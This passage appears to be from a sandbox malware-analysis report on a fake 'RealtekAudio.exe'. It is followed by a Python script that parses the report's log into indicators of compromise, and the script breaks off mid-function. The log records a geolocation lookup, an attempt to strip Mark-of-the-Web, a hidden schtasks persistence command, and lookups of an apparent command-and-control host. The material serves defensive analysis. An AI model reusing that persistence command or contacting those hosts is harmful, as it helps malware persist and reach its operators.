msctf.dll 0x76ca0000 0x76d6bfff Memory Mapped File rwx False False False -
usp10.dll 0x76d70000 0x76e0cfff Memory Mapped File rwx False False False -
shlwapi.dll 0x76e10000 0x76e66fff Memory Mapped File rwx False False False -
ntdll.dll 0x77230000 0x7736bfff Memory Mapped File rwx False False False -
sechost.dll 0x773c0000 0x773d8fff Memory Mapped File rwx False False False -
gdi32.dll 0x773e0000 0x7742dfff Memory Mapped File rwx False False False -
apisetschema.dll 0x77470000 0x77470fff Memory Mapped File rwx False False False -
pagefile_0x000000007f6f0000 0x7f6f0000 0x7f7effff Pagefile Backed Memory r True False False -
pagefile_0x000000007ffb0000 0x7ffb0000 0x7ffd2fff Pagefile Backed Memory r True False False -
private_0x000000007ffd8000 0x7ffd8000 0x7ffd8fff Private Memory rw True False False -
private_0x000000007ffd9000 0x7ffd9000 0x7ffd9fff Private Memory rw True False False -
private_0x000000007ffdb000 0x7ffdb000 0x7ffdbfff Private Memory rw True False False -
private_0x000000007ffdc000 0x7ffdc000 0x7ffdcfff Private Memory rw True False False -
private_0x000000007ffdd000 0x7ffdd000 0x7ffddfff Private Memory rw True False False -
private_0x000000007ffde000 0x7ffde000 0x7ffdefff Private Memory rw True False False -
private_0x000000007ffdf000 0x7ffdf000 0x7ffdffff Private Memory rw True False False -
Process #11: realtekaudio.exe
151 44
Information Value
ID #11
File Name c:\users\eebsym5\appdata\roaming\realtek\realtekaudio.exe
Command Line "C:\Users\EEBsYm5\AppData\Roaming\Realtek\RealtekAudio.exe"
Initial Working Directory C:\Users\EEBsYm5\Desktop\
Monitor Start Time: 00:01:41, Reason: Child Process
Unmonitor End Time: 00:04:27, Reason: Terminated by Timeout
Monitor Duration 00:02:46
OS Process Information
Information Value
PID 0xca0
Parent PID 0xbf4 (c:\users\eebsym5\appdata\local\temp\jrsi6vakyydz.exe)
Is Created or Modified Executable True
Integrity Level High (Elevated)
Username CRH2YWU7\EEBsYm5
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0xCA4
0xCA8
0xCAC
0xCB8
0xCBC
0xCC0
0xCC4
0xCC8
0xCCC
0xCD0
0xCD4
0xCD8
0xCDC
0xCE0
0xCE4
0xCE8
0xD5C
Region
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory rw True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory rw True False False -
private_0x0000000000020000 0x00020000 0x00020fff Private Memory rw True False False -
pagefile_0x0000000000030000 0x00030000 0x00033fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000040000 0x00040000 0x00040fff Pagefile Backed Memory r True False False -
locale.nls 0x00050000 0x000b6fff Memory Mapped File r False False False -
private_0x00000000000c0000 0x000c0000 0x000c0fff Private Memory rw True False False -
pagefile_0x00000000000d0000 0x000d0000 0x000d0fff Pagefile Backed Memory r True False False -
pagefile_0x00000000000e0000 0x000e0000 0x000e0fff Pagefile Backed Memory rw True False False -
private_0x00000000000f0000 0x000f0000 0x000fffff Private Memory rw True False False -
pagefile_0x0000000000100000 0x00100000 0x00100fff Pagefile Backed Memory rw True False False -
private_0x0000000000110000 0x00110000 0x0011ffff Private Memory - True False False -
private_0x0000000000120000 0x00120000 0x0012ffff Private Memory - True False False -
private_0x0000000000130000 0x00130000 0x0013ffff Private Memory - True False False -
private_0x0000000000140000 0x00140000 0x0014ffff Private Memory - True False False -
private_0x0000000000150000 0x00150000 0x0015ffff Private Memory - True False False -
private_0x0000000000160000 0x00160000 0x0016ffff Private Memory - True False False -
pagefile_0x0000000000170000 0x00170000 0x00170fff Pagefile Backed Memory rw True False False -
private_0x0000000000180000 0x00180000 0x0018ffff Private Memory - True False False -
l_intl.nls 0x00190000 0x00192fff Memory Mapped File r False False False -
pagefile_0x00000000001a0000 0x001a0000 0x001a0fff Pagefile Backed Memory r True False False -
private_0x00000000001b0000 0x001b0000 0x002affff Private Memory rw True False False -
pagefile_0x00000000002b0000 0x002b0000 0x00377fff Pagefile Backed Memory r True False False -
private_0x0000000000380000 0x00380000 0x0047ffff Private Memory rw True False False -
private_0x0000000000480000 0x00480000 0x0051ffff Private Memory rw True False False -
private_0x0000000000520000 0x00520000 0x0052ffff Private Memory rw True False False -
private_0x0000000000530000 0x00530000 0x0053ffff Private Memory - True False False -
pagefile_0x0000000000540000 0x00540000 0x00541fff Pagefile Backed Memory r True False False -
sorttbls.nlp 0x00550000 0x00554fff Memory Mapped File r False False False -
private_0x0000000000560000 0x00560000 0x0059ffff Private Memory rwx True False False -
rpcss.dll 0x005a0000 0x005fbfff Memory Mapped File r False False False -
sortkey.nlp 0x005a0000 0x005e0fff Memory Mapped File r False False False -
pagefile_0x00000000005f0000 0x005f0000 0x0060ffff Pagefile Backed Memory rw True False False -
private_0x0000000000610000 0x00610000 0x0061ffff Private Memory rw True False False -
pagefile_0x0000000000620000 0x00620000 0x00720fff Pagefile Backed Memory r True False False -
private_0x0000000000730000 0x00730000 0x007cffff Private Memory rw True False False -
private_0x0000000000730000 0x00730000 0x0073ffff Private Memory - True False False -
pagefile_0x0000000000740000 0x00740000 0x00740fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000750000 0x00750000 0x00756fff Pagefile Backed Memory r True False False -
pagefile_0x0000000000760000 0x00760000 0x00761fff Pagefile Backed Memory rw True False False -
pagefile_0x0000000000770000 0x00770000 0x00780fff Pagefile Backed Memory r True False False -
private_0x0000000000790000 0x00790000 0x007cffff Private Memory rw True False False -
pagefile_0x00000000007d0000 0x007d0000 0x007d0fff Pagefile Backed Memory r True False False -
private_0x0000000000870000 0x00870000 0x008affff Private Memory rwx True False False -
pagefile_0x00000000008b0000 0x008b0000 0x0098efff Pagefile Backed Memory r True False False -
realtekaudio.exe 0x009f0000 0x00a2bfff Memory Mapped File rwx True True False
pagefile_0x0000000000a30000 0x00a30000 0x0162ffff Pagefile Backed Memory r True False False -
private_0x0000000001670000 0x01670000 0x0176ffff Private Memory rw True False False -
private_0x0000000001780000 0x01780000 0x0178ffff Private Memory rw True False False -
private_0x0000000001830000 0x01830000 0x0192ffff Private Memory rw True False False -
sortdefault.nls 0x01930000 0x01bfefff Memory Mapped File r False False False -
private_0x0000000001c00000 0x01c00000 0x03bfffff Private Memory rw True False False -
private_0x0000000003c00000 0x03c00000 0x03d8ffff Private Memory rw True False False -
kernelbase.dll.mui 0x03c00000 0x03cbffff Memory Mapped File rw False False False -
private_0x0000000003d50000 0x03d50000 0x03d8ffff Private Memory rw True False False -
private_0x0000000003da0000 0x03da0000 0x03e9ffff Private Memory rw True False False -
pagefile_0x0000000003ea0000 0x03ea0000 0x04292fff Pagefile Backed Memory r True False False -
private_0x0000000004320000 0x04320000 0x0441ffff Private Memory rw True False False -
private_0x0000000004440000 0x04440000 0x0453ffff Private Memory rw True False False -
private_0x00000000045a0000 0x045a0000 0x0469ffff Private Memory rw True False False -
private_0x00000000046a0000 0x046a0000 0x0479ffff Private Memory rw True False False -
private_0x0000000004800000 0x04800000 0x048fffff Private Memory rw True False False -
private_0x0000000004900000 0x04900000 0x04aaffff Private Memory rw True False False -
private_0x0000000004940000 0x04940000 0x04a3ffff Private Memory rw True False False -
private_0x0000000004a70000 0x04a70000 0x04aaffff Private Memory rw True False False -
private_0x0000000004ab0000 0x04ab0000 0x04c4ffff Private Memory rw True False False -
private_0x0000000004ab0000 0x04ab0000 0x04bbffff Private Memory rw True False False -
private_0x0000000004c10000 0x04c10000 0x04c4ffff Private Memory rw True False False -
private_0x0000000004d30000 0x04d30000 0x04e2ffff Private Memory rw True False False -
private_0x0000000004e90000 0x04e90000 0x04f8ffff Private Memory rw True False False -
system.xml.ni.dll 0x68560000 0x68a95fff Memory Mapped File rwx True False False -
system.windows.forms.dll 0x685d0000 0x68a9dfff Memory Mapped File rwx False False False -
system.windows.forms.ni.dll 0x68aa0000 0x6967dfff Memory Mapped File rwx True False False -
system.ni.dll 0x69680000 0x69e1bfff Memory Mapped File rwx True False False -
system.configuration.ni.dll 0x6bcb0000 0x6bda0fff Memory Mapped File rwx True False False -
system.drawing.ni.dll 0x6bdb0000 0x6bf37fff Memory Mapped File rwx True False False -
mscorlib.ni.dll 0x6bf40000 0x6ca37fff Memory Mapped File rwx True False False -
mscorwks.dll 0x6ca40000 0x6cfeafff Memory Mapped File rwx True False False -
system.management.ni.dll 0x6de80000 0x6df83fff Memory Mapped File rwx True False False -
shfolder.dll 0x6e010000 0x6e014fff Memory Mapped File rwx False False False -
msvcr80.dll 0x6e180000 0x6e21afff Memory Mapped File rwx False False False -
wmiutils.dll 0x6e880000 0x6e896fff Memory Mapped File rwx False False False -
wbemprox.dll 0x6ebe0000 0x6ebe9fff Memory Mapped File rwx False False False -
wbemcomn.dll 0x6f7c0000 0x6f81bfff Memory Mapped File rwx False False False -
mscorjit.dll 0x6f900000 0x6f95afff Memory Mapped File rwx True False False -
mscoreei.dll 0x6f960000 0x6f9d7fff Memory Mapped File rwx True False False -
webio.dll 0x6fcf0000 0x6fd3efff Memory Mapped File rwx False False False -
winhttp.dll 0x6fd40000 0x6fd97fff Memory Mapped File rwx False False False -
rasadhlp.dll 0x704a0000 0x704a5fff Memory Mapped File rwx False False False -
mscoree.dll 0x71de0000 0x71e29fff Memory Mapped File rwx True False False -
rasman.dll 0x725f0000 0x72604fff Memory Mapped File rwx False False False -
rasapi32.dll 0x72610000 0x72661fff Memory Mapped File rwx False False False -
rtutils.dll 0x73390000 0x7339cfff Memory Mapped File rwx False False False -
dhcpcsvc.dll 0x73670000 0x73681fff Memory Mapped File rwx False False False -
dhcpcsvc6.dll 0x73690000 0x7369cfff Memory Mapped File rwx False False False -
fwpuclnt.dll 0x736b0000 0x736e7fff Memory Mapped File rwx False False False -
winnsi.dll 0x737c0000 0x737c6fff Memory Mapped File rwx False False False -
iphlpapi.dll 0x737d0000 0x737ebfff Memory Mapped File rwx False False False -
uxtheme.dll 0x741e0000 0x7421ffff Memory Mapped File rwx False False False -
version.dll 0x748d0000 0x748d8fff Memory Mapped File rwx False False False -
wshtcpip.dll 0x74960000 0x74964fff Memory Mapped File rwx False False False -
credssp.dll 0x74b20000 0x74b27fff Memory Mapped File rwx False False False -
rsaenh.dll 0x74bf0000 0x74c2afff Memory Mapped File rwx False False False -
dnsapi.dll 0x74cd0000 0x74d13fff Memory Mapped File rwx False False False -
wship6.dll 0x74e00000 0x74e05fff Memory Mapped File rwx False False False -
mswsock.dll 0x74e10000 0x74e4bfff Memory Mapped File rwx False False False -
cryptsp.dll 0x74e50000 0x74e65fff Memory Mapped File rwx False False False -
bcrypt.dll 0x74f80000 0x74f96fff Memory Mapped File rwx False False False -
sspicli.dll 0x752b0000 0x752cafff Memory Mapped File rwx False False False -
cryptbase.dll 0x752d0000 0x752dbfff Memory Mapped File rwx False False False -
rpcrtremote.dll 0x75370000 0x7537dfff Memory Mapped File rwx False False False -
profapi.dll 0x75380000 0x7538afff Memory Mapped File rwx False False False -
kernelbase.dll 0x75540000 0x75589fff Memory Mapped File rwx False False False -
cfgmgr32.dll 0x75590000 0x755b6fff Memory Mapped File rwx False False False -
rpcrt4.dll 0x75680000 0x75720fff Memory Mapped File rwx False False False -
clbcatq.dll 0x75780000 0x75802fff Memory Mapped File rwx False False False -
nsi.dll 0x75810000 0x75815fff Memory Mapped File rwx False False False -
shell32.dll 0x75830000 0x76479fff Memory Mapped File rwx False False False -
lpk.dll 0x76480000 0x76489fff Memory Mapped File rwx False False False -
imm32.dll 0x76490000 0x764aefff Memory Mapped File rwx False False False -
ole32.dll 0x76750000 0x768abfff Memory Mapped File rwx False False False -
kernel32.dll 0x76910000 0x769e3fff Memory Mapped File rwx False False False -
advapi32.dll 0x769f0000 0x76a8ffff Memory Mapped File rwx False False False -
msvcrt.dll 0x76a90000 0x76b3bfff Memory Mapped File rwx False False False -
user32.dll 0x76b40000 0x76c08fff Memory Mapped File rwx False False False -
oleaut32.dll 0x76c10000 0x76c9efff Memory Mapped File rwx False False False -
msctf.dll 0x76ca0000 0x76d6bfff Memory Mapped File rwx False False False -
usp10.dll 0x76d70000 0x76e0cfff Memory Mapped File rwx False False False -
shlwapi.dll 0x76e10000 0x76e66fff Memory Mapped File rwx False False False -
ntdll.dll 0x77230000 0x7736bfff Memory Mapped File rwx False False False -
ws2_32.dll 0x77380000 0x773b4fff Memory Mapped File rwx False False False -
sechost.dll 0x773c0000 0x773d8fff Memory Mapped File rwx False False False -
gdi32.dll 0x773e0000 0x7742dfff Memory Mapped File rwx False False False -
apisetschema.dll 0x77470000 0x77470fff Memory Mapped File rwx False False False -
pagefile_0x000000007f6f0000 0x7f6f0000 0x7f7effff Pagefile Backed Memory r True False False -
private_0x000000007ff50000 0x7ff50000 0x7ff5ffff Private Memory rwx True False False -
private_0x000000007ff60000 0x7ff60000 0x7ffaffff Private Memory rwx True False False -
pagefile_0x000000007ffb0000 0x7ffb0000 0x7ffd2fff Pagefile Backed Memory r True False False -
private_0x000000007ffd4000 0x7ffd4000 0x7ffd4fff Private Memory rw True False False -
private_0x000000007ffd5000 0x7ffd5000 0x7ffd5fff Private Memory rw True False False -
private_0x000000007ffd6000 0x7ffd6000 0x7ffd6fff Private Memory rw True False False -
private_0x000000007ffd7000 0x7ffd7000 0x7ffd7fff Private Memory rw True False False -
private_0x000000007ffd8000 0x7ffd8000 0x7ffd8fff Private Memory rw True False False -
private_0x000000007ffd9000 0x7ffd9000 0x7ffd9fff Private Memory rw True False False -
private_0x000000007ffda000 0x7ffda000 0x7ffdafff Private Memory rw True False False -
private_0x000000007ffdb000 0x7ffdb000 0x7ffdbfff Private Memory rw True False False -
private_0x000000007ffdc000 0x7ffdc000 0x7ffdcfff Private Memory rw True False False -
private_0x000000007ffdd000 0x7ffdd000 0x7ffddfff Private Memory rw True False False -
private_0x000000007ffde000 0x7ffde000 0x7ffdefff Private Memory rw True False False -
private_0x000000007ffdf000 0x7ffdf000 0x7ffdffff Private Memory rw True False False -
For performance reasons, the remaining 15 entries are omitted.
The remaining entries can be found in flog.txt.
Threads
Thread 0xca4
94 42
Category Operation Information Success Count Logfile
System Get Info type = Operating System True 3
Fn
Mutex Create mutex_name = QSR_MUTEX_QSHCFbGIqN10lIdkUq True 1
Fn
System Get Info type = Operating System True 1
Fn
File Get Info filename = C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config, type = file_attributes True 2
Fn
File Create filename = C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config, type = file_type True 2
Fn
File Get Info filename = C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config, type = size, size_out = 0 True 1
Fn
File Read filename = C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config, size = 4096, size_out = 4096 True 2
Fn
Data
File Get Info filename = C:\Users\EEBsYm5\AppData\Roaming\Realtek\RealtekAudio.config, type = file_attributes False 2
Fn
System Get Info type = Operating System True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion, value_name = InstallationType, data = 0, type = REG_SZ True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion, value_name = InstallationType, data = Client, type = REG_SZ True 1
Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Socket Close type = SOCK_DGRAM True 1
Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET6, type = SOCK_DGRAM True 1
Fn
Socket Close type = SOCK_DGRAM True 1
Fn
System Get Computer Name result_out = CRH2YWU7 True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = Library, data = 0, type = REG_SZ True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = Library, data = netfxperf.dll, type = REG_SZ True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = IsMultiInstance, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = IsMultiInstance, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = First Counter, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = First Counter, data = 4160, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance, value_name = CategoryOptions, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance, value_name = CategoryOptions, data = 3, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance, value_name = FileMappingSize, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance, value_name = FileMappingSize, data = 131072, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance, value_name = Counter Names, type = REG_BINARY True 2
Fn
Data
Module Create Mapping filename = System Paging File, protection = PAGE_READWRITE, maximum_size = 131072 True 1
Fn
Module Map process_name = c:\users\eebsym5\appdata\roaming\realtek\realtekaudio.exe, desired_access = FILE_MAP_WRITE True 1
Fn
System Get Info type = Operating System True 2
Fn
Mutex Open mutex_name = Global\.net clr networking, desired_access = MUTEX_MODIFY_STATE, SYNCHRONIZE True 1
Fn
Mutex Release - True 1
Fn
Mutex Create mutex_name = Global\.net clr networking True 1
Fn
Mutex Release mutex_name = Global\.net clr networking True 1
Fn
Mutex Create mutex_name = Global\.net clr networking True 1
Fn
Mutex Release mutex_name = Global\.net clr networking True 1
Fn
Mutex Create mutex_name = Global\.net clr networking True 1
Fn
Mutex Release mutex_name = Global\.net clr networking True 1
Fn
Mutex Create mutex_name = Global\.net clr networking True 1
Fn
Mutex Release mutex_name = Global\.net clr networking True 1
Fn
Mutex Create mutex_name = Global\.net clr networking True 1
Fn
Mutex Release mutex_name = Global\.net clr networking True 1
Fn
Mutex Create mutex_name = Global\.net clr networking True 1
Fn
Mutex Release mutex_name = Global\.net clr networking True 1
Fn
Mutex Create mutex_name = Global\.net clr networking True 1
Fn
Mutex Release mutex_name = Global\.net clr networking True 1
Fn
Mutex Create mutex_name = Global\.net clr networking True 1
Fn
Mutex Release mutex_name = Global\.net clr networking True 1
Fn
Mutex Create mutex_name = Global\.net clr networking True 1
Fn
Mutex Release mutex_name = Global\.net clr networking True 1
Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET6, type = SOCK_DGRAM True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings True 1
Fn
Socket Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1
Fn
Socket Create protocol = IPPROTO_TCP, address_family = AF_INET6, type = SOCK_STREAM True 1
Fn
DNS Resolve Name host = api.ipstack.com, address_out = 198.23.101.146, 158.85.167.221 True 1
Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET6, type = SOCK_DGRAM True 1
Fn
Socket Connect remote_address = 198.23.101.146, remote_port = 80 True 1
Fn
Socket Close type = SOCK_STREAM True 1
Fn
Socket Send flags = NO_FLAG_SET, size = 204, size_out = 204 True 1
Fn
Data
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.3; rv:40.0) Gecko/20100101 Firefox/49.0, access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS True 1
Fn
Inet Open Connection protocol = http, server_name = api.ipstack.com, server_port = 80 True 1
Fn
Inet Open HTTP Request http_verb = GET, http_version = HTTP/1.1, target_resource = /check?access_key=5fe547c4ec9ffabae465e7864d212dc4&output=xml True 1
Fn
Inet Send HTTP Request headers = host: api.ipstack.com, connection: Keep-Alive, user-agent: Mozilla/5.0 (Windows NT 6.3; rv:40.0) Gecko/20100101 Firefox/49.0, url = api.ipstack.com/check?access_key=5fe547c4ec9ffabae465e7864d212dc4&output=xml True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 4096, size_out = 966 True 1
Fn
Data
Inet Read Response size = 4096, size_out = 966 True 1
Fn
Data
File Delete filename = C:\Users\EEBsYm5\AppData\Roaming\Realtek\RealtekAudio.exe:Zone.Identifier False 1
Fn
Process Create process_name = "schtasks" /create /tn "Realtek Audio Service" /sc ONLOGON /tr "C:\Users\EEBsYm5\AppData\Roaming\Realtek\RealtekAudio.exe" /rl HIGHEST /f, os_pid = 0xcec, creation_flags = CREATE_NO_WINDOW, show_window = SW_HIDE True 1
Fn
DNS Resolve Name host = r3m0te.65cdn.com, address_out = 104.207.155.61 True 1
Fn
Socket Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1
Fn
Socket Close type = SOCK_STREAM True 1
Fn
Module Get Handle module_name = c:\users\eebsym5\appdata\roaming\realtek\realtekaudio.exe, base_address = 0x9f0000 True 2
Fn
Window Create class_name = WindowsForms10.Window.8.app.0.33c0d9d, wndproc_parameter = 0 True 1
Fn
Window Set Attribute class_name = WindowsForms10.Window.8.app.0.33c0d9d, index = 18446744073709551612, new_long = 1991594109 True 1
Fn
Window Set Attribute class_name = WindowsForms10.Window.8.app.0.33c0d9d, index = 18446744073709551612, new_long = 8850562 True 1
Fn
DNS Resolve Name host = r3m0te.65cdn.com, address_out = 104.207.155.61 True 1
Fn
Socket Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1
Fn
Socket Close type = SOCK_STREAM True 1
Fn
DNS Resolve Name host = r3m0te.65cdn.com, address_out = 104.207.155.61 True 1
Fn
Socket Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1
Fn
Socket Close type = SOCK_STREAM True 1
Fn
DNS Resolve Name host = r3m0te.65cdn.com, address_out = 104.207.155.61 True 1
Fn
Socket Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1
Fn
Socket Close type = SOCK_STREAM True 1
Fn
DNS Resolve Name host = r3m0te.65cdn.com, address_out = 104.207.155.61 True 1
Fn
Socket Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1
Fn
Socket Close type = SOCK_STREAM True 1
Fn
Inet Close Session - True 1
Fn
DNS Resolve Name host = r3m0te.65cdn.com, address_out = 104.207.155.61 True 1
Fn
Socket Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1
Fn
Socket Close type = SOCK_STREAM True 1
Fn
Inet Close Session - True 1
Fn
DNS Resolve Name host = r3m0te.65cdn.com, address_out = 104.207.155.61 True 1
Fn
Socket Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1
Fn
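The Thread 0xca4 table above packs the behaviours an analyst cares about into flat "Category Operation Information Success Count" rows: a named mutex (QSR_MUTEX_...), a DNS lookup and HTTP GET to api.ipstack.com with an access key embedded in the request path (an external-IP/geolocation lookup), an attempted deletion of the Zone.Identifier alternate data stream on the dropped RealtekAudio.exe (which would strip Mark-of-the-Web; the report records it as failed), a schtasks /create with an ONLOGON trigger and /rl HIGHEST pointing at a binary under %APPDATA%, and repeated resolutions of r3m0te.65cdn.com with TCP sockets created and closed without a recorded connect. The script below is an added example, not part of the VMRay report: it parses rows in exactly this flattened format into IOCs (mutexes, IPs, URLs, per-host DNS counts, parsed scheduled-task fields) and tags the two behaviours above. SAMPLE_LOG is a constructed subset of rows copied from the thread log; the behaviour labels ("motw_removal", "persistence_scheduled_task") and the user-writable-path heuristic are this script's own interpretation, not VMRay's classification.

```python
"""Extract IOCs and notable behaviours from VMRay-style
'Category Operation Information Success Count' log rows.

Added example, not part of the VMRay report. SAMPLE_LOG is a constructed
subset of rows copied from the Thread 0xca4 table; behaviour labels are this
script's interpretation.
"""
import re
from dataclasses import dataclass, field

# Constructed sample: a subset of the Thread 0xca4 rows, one per behaviour of interest.
SAMPLE_LOG = r"""
Mutex Create mutex_name = QSR_MUTEX_QSHCFbGIqN10lIdkUq True 1
DNS Resolve Name host = api.ipstack.com, address_out = 198.23.101.146, 158.85.167.221 True 1
Socket Connect remote_address = 198.23.101.146, remote_port = 80 True 1
Inet Open Connection protocol = http, server_name = api.ipstack.com, server_port = 80 True 1
Inet Open HTTP Request http_verb = GET, http_version = HTTP/1.1, target_resource = /check?access_key=5fe547c4ec9ffabae465e7864d212dc4&output=xml True 1
File Delete filename = C:\Users\EEBsYm5\AppData\Roaming\Realtek\RealtekAudio.exe:Zone.Identifier False 1
Process Create process_name = "schtasks" /create /tn "Realtek Audio Service" /sc ONLOGON /tr "C:\Users\EEBsYm5\AppData\Roaming\Realtek\RealtekAudio.exe" /rl HIGHEST /f, os_pid = 0xcec, creation_flags = CREATE_NO_WINDOW, show_window = SW_HIDE True 1
DNS Resolve Name host = r3m0te.65cdn.com, address_out = 104.207.155.61 True 1
DNS Resolve Name host = r3m0te.65cdn.com, address_out = 104.207.155.61 True 1
"""

# Operations this parser understands; every other row is skipped.
OPERATIONS = ("Mutex Create", "DNS Resolve Name", "Socket Connect", "Inet Open Connection",
              "Inet Open HTTP Request", "File Delete", "Process Create")

# Heuristic (this script's assumption): drop locations any user process can write to.
USER_WRITABLE = re.compile(r"\\Users\\[^\\]+\\AppData\\(?:Local\\Temp|Roaming)\\", re.I)


@dataclass
class Iocs:
    mutexes: set = field(default_factory=set)
    ips: set = field(default_factory=set)
    urls: set = field(default_factory=set)
    dns_lookups: dict = field(default_factory=dict)   # host -> number of resolutions
    scheduled_tasks: list = field(default_factory=list)
    behaviours: list = field(default_factory=list)    # (label, subject, success)


def parse_fields(info):
    """Split 'k1 = v1, k2 = v2, ...' into a dict. The split only happens in front of
    a 'key =' token, so comma-separated values (address_out lists) stay intact."""
    fields = {}
    for part in re.split(r",\s+(?=\w+\s*=\s)", info):
        key, _, value = part.partition(" = ")
        fields[key.strip()] = value.strip()
    return fields


def parse_schtasks(cmd):
    """Pull /tn, /sc, /tr and /rl out of a 'schtasks /create' command line."""
    def opt(flag):
        m = re.search(rf'/{flag}\s+(?:"([^"]*)"|(\S+))', cmd, re.I)
        return None if m is None else (m.group(1) if m.group(1) is not None else m.group(2))
    return {"name": opt("tn"), "schedule": opt("sc"), "action": opt("tr"), "run_level": opt("rl")}


def extract(log_text):
    iocs = Iocs()
    server = None  # last 'Inet Open Connection', so a request path can be joined to its host
    for line in log_text.splitlines():
        line = line.strip()
        op = next((o for o in OPERATIONS if line.startswith(o + " ")), None)
        if op is None:
            continue
        # Row layout: '<operation> <info> <True|False> <count>'
        info, success, _count = line[len(op) + 1:].rsplit(" ", 2)
        ok = success == "True"
        fields = parse_fields(info)

        if op == "Mutex Create":
            iocs.mutexes.add(fields["mutex_name"])
        elif op == "DNS Resolve Name":
            host = fields["host"]
            iocs.dns_lookups[host] = iocs.dns_lookups.get(host, 0) + 1
            iocs.ips.update(a.strip() for a in fields["address_out"].split(","))
        elif op == "Socket Connect":
            iocs.ips.add(fields["remote_address"])
        elif op == "Inet Open Connection":
            server = (fields["protocol"], fields["server_name"], fields["server_port"])
        elif op == "Inet Open HTTP Request" and server:
            proto, host, port = server
            default_port = (proto, port) in (("http", "80"), ("https", "443"))
            iocs.urls.add(f"{proto}://{host}{'' if default_port else ':' + port}{fields['target_resource']}")
        elif op == "File Delete" and fields["filename"].lower().endswith(":zone.identifier"):
            # Deleting the Zone.Identifier ADS strips Mark-of-the-Web from a dropped file.
            iocs.behaviours.append(("motw_removal", fields["filename"], ok))
        elif op == "Process Create" and "schtasks" in fields["process_name"].lower():
            task = parse_schtasks(fields["process_name"])
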